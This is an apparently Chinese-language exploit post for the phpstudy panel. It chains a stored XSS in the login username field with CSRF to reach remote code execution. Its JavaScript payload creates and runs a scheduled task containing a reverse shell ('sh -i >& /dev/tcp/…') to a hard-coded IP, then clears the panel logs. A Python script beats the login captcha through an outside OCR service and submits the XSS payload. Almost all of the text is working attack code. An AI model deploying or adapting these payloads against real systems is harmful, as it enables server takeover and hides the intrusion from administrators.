phpstudy xss+csrf组合拳rce＋登录入口绕过

function poc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    var id=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
function save(){
  var data=new Object();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="17";
  data.minute = "05";
  data.shell='sh -i >& /dev/tcp/39.101.70.33/1234 0>&1';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

<script src="xxx/poc.js"></script>
放用户名那里登陆一下就可以了
登录入口绕过方法
main.py

from requests import *
from base64 import *
import ocr

baseUrl="http://39.101.70.33:9080/"
codeUrl=baseUrl+"service/app/account.php?type=vercode"
loginUrl=baseUrl+"service/app/account.php"
m=get(codeUrl)
img=b64encode(m.content)
code=ocr.ocr(img)
header={
    "Cookie":f"{m.cookies.keys()[0]}={m.cookies.values()[0]}",
    "X-Requested-With":"XMLHttpRequest"
}
print(code)
print(header['Cookie'])
body={
    "type":"login",
    "username":"<script>alert(11112222)</script>",
    "password":"123456",
    "verifycode":code
}
n=post(loginUrl,data=body,headers=header)
print(n.text)

ocr.py

from requests import *
def ocr(imgEnc):
    ocrUrl="https://www.jfbym.com/api/YmServer/customApi"
    data={
        "image":imgEnc,
        "token":"",
        "type":"10110"
    }
    resp = post(ocrUrl, data=data)
    return eval(resp.text)['data']['data']